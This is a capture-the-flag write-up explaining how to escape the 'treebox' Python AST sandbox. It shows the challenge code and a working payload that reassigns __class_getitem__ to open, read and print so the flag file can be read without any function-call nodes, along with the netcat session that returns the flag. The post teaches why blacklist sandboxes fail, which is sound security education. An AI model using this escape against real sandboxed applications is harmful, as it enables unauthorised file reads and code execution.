@taswhe
Created August 4, 2022 14:31

TreeBox: Escaping a Python AST Sandbox

Python is a versatile and easy-to-learn programming language. As such, developers are keen to use it as a "mini-programming language" for users to write custom code that will run within an application's sandbox. The usual idea is to do the following:

  1. read the user's custom code;
  2. verify that the code is safe to execute (i.e. sandbox it);
  3. exec() the verified safe code.

Clearly, the challenge here is to "verify that the code is safe to execute". How do we do that in practice? An often-suggested way is to parse the code into an Abstract Syntax Tree (AST). We can then inspect the AST to ban the node types we do not want (blacklisting) and/or to allow only the ones we do want (whitelisting).

Creating an AST is easily accomplished with the ast module. However, deciding what to blacklist in a sandbox is notoriously difficult. This is clearly demonstrated in the treebox challenge.
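As a rough illustration of the blacklisting idea, the sketch below parses a snippet with the ast module and reports which banned node types it contains. The helper name find_banned_nodes and the particular BANNED tuple are assumptions made for this example, not part of any library.

```python
import ast

# Illustrative blacklist: node types we choose to reject (an assumption for this sketch).
BANNED = (ast.Import, ast.ImportFrom, ast.Call)

def find_banned_nodes(source):
    """Return the class names of all banned nodes found in the source text."""
    tree = ast.parse(source)
    return [type(node).__name__ for node in ast.walk(tree) if isinstance(node, BANNED)]

# A snippet that imports a module and calls a function is flagged twice.
print(find_banned_nodes("import os\nos.getcwd()"))

# Plain arithmetic contains none of the banned node types.
print(find_banned_nodes("x = 1 + 2"))
```

Note that the check looks only at node types; it says nothing about what the code does when it runs.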

The treebox Challenge

In treebox, we are given the following Python script.

#!/usr/bin/python3 -u
#
# Flag is in a file called "flag" in cwd.
#
# Quote from Dockerfile:
#   FROM ubuntu:22.04
#   RUN apt-get update && apt-get install -y python3
#
import ast
import sys
import os

def verify_secure(m):
  for x in ast.walk(m):
    match type(x):
      case (ast.Import|ast.ImportFrom|ast.Call):
        print(f"ERROR: Banned statement {x}")
        return False
  return True

abspath = os.path.abspath(__file__)
dname = os.path.dirname(abspath)
os.chdir(dname)

print("-- Please enter code (last line must contain only --END)")
source_code = ""
while True:
  line = sys.stdin.readline()
  if line.startswith("--END"):
    break
  source_code += line

tree = compile(source_code, "input.py", 'exec', flags=ast.PyCF_ONLY_AST)
if verify_secure(tree):  # Safe to execute!
  print("-- Executing safe code:")
  compiled = compile(source_code, "input.py", 'exec')
  exec(compiled)

The code's logic is straightforward: it reads in lines of user input, compiles them into an AST, and then calls verify_secure() to check that the AST does not use import, from ... import ... and that it does not make any function calls.

That is indeed a very restrictive blacklist. Without imports and function calls, surely the user can do no harm... right?

Bypassing verify_secure()

The code says that the Flag is in a file called "flag" in cwd. If not for verify_secure(), the following "attack code" would trivially allow us to capture the flag:

fd = open("flag")
flag = fd.read()
print(flag)

Alas, the reality is that verify_secure() is invoked and that it will ban all 3 ast.Calls.
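To see the three offending nodes, here is a small sketch that parses the attack code and lists every ast.Call together with the expression being called. It only inspects the tree and never executes the attack code; ast.unparse() requires Python 3.9 or later.

```python
import ast

attack = '''fd = open("flag")
flag = fd.read()
print(flag)
'''

# Collect every Call node in the tree; nothing is executed here.
calls = [node for node in ast.walk(ast.parse(attack)) if isinstance(node, ast.Call)]

for call in calls:
    # ast.unparse() turns the callee expression back into source text.
    print(f"line {call.lineno}: call to {ast.unparse(call.func)}")

print(len(calls), "Call nodes found")
```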

But what if we can modify our code into a form that calls the 3 functions (open, read and print) in a way that does not use ast.Call in its AST? If we can do that, then we would be able to bypass verify_secure().

Indexing as function calls

In terms of syntax and semantics, an indexing operation a[x] looks a lot like a function call f(x). In both cases, we pass in an input and we get its corresponding output.

Indeed, Python internally implements indexing using the special method __getitem__(). If we have a list a, evaluating a[x] results in type(a).__getitem__(a, x) being called, which for a list is equivalent to a.__getitem__(x). However, and this is the critical observation, the resulting AST does NOT contain any ast.Call, because indexing is mapped to ast.Subscript. Take a look:

>>> print(ast.dump(compile("a[0]", "", "exec", flags=ast.PyCF_ONLY_AST),indent=4))
Module(
    body=[
        Expr(
            value=Subscript(
                value=Name(id='a', ctx=Load()),
                slice=Constant(value=0),
                ctx=Load()))],
    type_ignores=[])

This means that if we replace __getitem__() with print, we can invoke a[x] to do print(x). Furthermore, the resulting AST does not contain ast.Call!

Built-in types are immutable

Does that mean we can now just replace list.__getitem__ with the appropriate functions and solve the challenge?

Not so fast! Built-in types like list are immutable and so their attributes can't be changed programmatically:

>>> list.__getitem__ = print
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: cannot set '__getitem__' attribute of immutable type 'list'

If we can't use built-in types, how about creating our own?

>>> class A: pass
>>> A.__getitem__ = print
>>> a = A()
>>> a["hello world"]
hello world

That works! But here's the catch: a = A() generates an ast.Call and so the code above would not get around verify_secure().
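The sketch below checks each statement of that snippet separately, to confirm that only the instantiation line introduces an ast.Call. The variable names are chosen for this example only.

```python
import ast

source = '''class A: pass
A.__getitem__ = print
a = A()
a["hello world"]
'''

flags = []
for stmt in ast.parse(source).body:
    # Does this top-level statement contain a Call node anywhere inside it?
    has_call = any(isinstance(node, ast.Call) for node in ast.walk(stmt))
    flags.append(has_call)
    print(f"line {stmt.lineno}: Call present = {has_call}")
```

Only the third statement, a = A(), is flagged; the class definition, the attribute assignment and the subscript are all free of ast.Call.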

Capturing the flag

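All is not lost though. It turns out that since Python 3.7 (PEP 560), a class can have a __class_getitem__ method, which Python calls when the class itself is subscripted, as in A[x]. It exists to allow run-time parameterization of generic classes, but for our purposes the key point is that no instance is needed, and therefore no ast.Call.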

Using this feature, we can now easily accomplish what we want:

$ nc treebox.2022.ctfcompetition.com 1337
== proof-of-work: disabled ==
-- Please enter code (last line must contain only --END)
class A: pass
A.__class_getitem__ = open
fd = A["flag"]
A.__class_getitem__ = fd.read
flag = A[-1]
A.__class_getitem__ = print
A[flag]
--END
-- Executing safe code:
CTF{CzeresniaTopolaForsycja}

By successively replacing A.__class_getitem__ with the functions of our choice, we are able to call them using a subscripting syntax instead of the usual function call syntax.
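The exploit can be reproduced locally without the challenge server. The sketch below is a minimal stand-in under stated assumptions: the flag file lives in a temporary directory, its content CTF{placeholder} is made up, and contains_banned() is a simplified imitation of verify_secure(). The harness itself uses ordinary calls; only the payload has to be call-free.

```python
import ast
import contextlib
import io
import os
import tempfile

def contains_banned(source):
    """Simplified imitation of the challenge's check (an assumption for this sketch)."""
    banned = (ast.Import, ast.ImportFrom, ast.Call)
    return any(isinstance(node, banned) for node in ast.walk(ast.parse(source)))

# The payload uses only class definition, assignment and subscripting.
payload = '''class A: pass
A.__class_getitem__ = open
fd = A[flag_path]
A.__class_getitem__ = fd.read
flag = A[-1]
A.__class_getitem__ = print
A[flag]
'''

payload_is_flagged = contains_banned(payload)

with tempfile.TemporaryDirectory() as tmp:
    flag_path = os.path.join(tmp, "flag")
    with open(flag_path, "w") as f:
        f.write("CTF{placeholder}")  # made-up flag content

    namespace = {"flag_path": flag_path}
    captured = io.StringIO()
    with contextlib.redirect_stdout(captured):
        exec(payload, namespace)
    namespace["fd"].close()  # close the file before the directory is removed

output = captured.getvalue().strip()
print("flagged by check:", payload_is_flagged)
print("payload printed:", output)
```

The payload passes the check and still prints the file's content, since each A[...] is an ast.Subscript that ends up calling whatever is currently stored in A.__class_getitem__.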

Conclusion

An AST captures only the syntax of the Python code; it is not aware that Python internally implements subscripting as function calls to __getitem__() or __class_getitem__(). That knowledge is what allows us to escape the sandbox.

Of course, now that we are aware, we could attempt to add ast.Subscript to the blacklist. But a sandboxed environment that prohibits subscripting is pretty much useless, as we could no longer index into a list or a dict.
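To get a feel for how restrictive such a ban would be, the sketch below applies a hypothetical Subscript check to a few harmless snippets. The helper name and the sample snippets are assumptions made for this example.

```python
import ast

def rejected_by_subscript_ban(source):
    """Hypothetical extra rule: reject any code containing ast.Subscript."""
    return any(isinstance(node, ast.Subscript) for node in ast.walk(ast.parse(source)))

samples = {
    "dict lookup": "prices = {'tea': 3}\ntotal = prices['tea'] * 2",
    "list indexing": "items = [1, 2, 3]\nfirst = items[0]",
    "list slicing": "items = [1, 2, 3]\ntail = items[1:]",
    "plain arithmetic": "x = 1 + 2",
}

results = {name: rejected_by_subscript_ban(code) for name, code in samples.items()}
for name, rejected in results.items():
    print(f"{name}: rejected = {rejected}")
```

Everything except the plain arithmetic is rejected, including perfectly ordinary dict lookups and list slices.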

Also, an AST is not aware that exec() exposes the imported modules to the code it executes. So even if we disallow ast.Import and ast.ImportFrom, the sandboxed code still has access to ast, sys and os: they were imported before exec() was called, and by default exec() runs the code in the calling script's global namespace. (Our exploit is simple enough that we did not have to use this "feature".)
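A minimal sketch of this leak follows. The helper run_with_host_globals() is an assumption for this example: it executes a snippet against a copy of the current module's globals, which approximates what a bare exec(compiled) sees in the challenge script.

```python
import ast
import os

def contains_import(source):
    """Check only for import statements (an assumption for this sketch)."""
    banned = (ast.Import, ast.ImportFrom)
    return any(isinstance(node, banned) for node in ast.walk(ast.parse(source)))

def run_with_host_globals(source):
    # Copy the host module's globals so the snippet sees what the host imported.
    scope = dict(globals())
    exec(source, scope)
    return scope

# The snippet has no import statement, yet it can reach the os module.
snippet = "leaked_name = os.__name__\nleaked_sep = os.sep"

snippet_has_import = contains_import(snippet)
scope = run_with_host_globals(snippet)
print("contains import:", snippet_has_import)
print("module reached:", scope["leaked_name"])
```

The snippet reads attributes of os without ever importing it, because the name os was already bound in the namespace that exec() handed to it.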

In summary, implementing a Python sandbox using an AST with a blacklist is really not such a great idea.
